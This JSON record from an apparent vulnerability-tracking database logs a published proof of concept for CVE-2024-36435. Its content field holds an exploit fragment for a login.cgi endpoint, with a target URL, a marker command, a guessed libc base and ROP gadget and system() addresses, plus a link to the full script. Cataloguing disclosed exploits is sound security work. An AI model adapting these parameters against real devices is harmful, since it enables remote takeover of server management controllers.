{"uuid": "c9cf9d3a-899e-4461-91d5-da44549201ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36435", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1004", "content": "Target = \"https://{ip_address}/cgi/login.cgi\"\ncommand = \"touch /tmp/BRLY\"\n\nlibc = 0x76283000    # we try to guess\ngadget1 = 0x000D8874  # pop {r0, r1, r2, r3, fp, pc};\ngadget2 = 0x001026D4  # mov r0, sp; blx r3;\nsystem  = 0x0003C4D4\n\nhttps://github.com/binarly-io/ToolsAndPoCs/blob/master/Posix/Supermicro/CVE-2024-36435.py\n\n#CyberDilara", "creation_timestamp": "2024-09-30T07:30:50.000000Z"}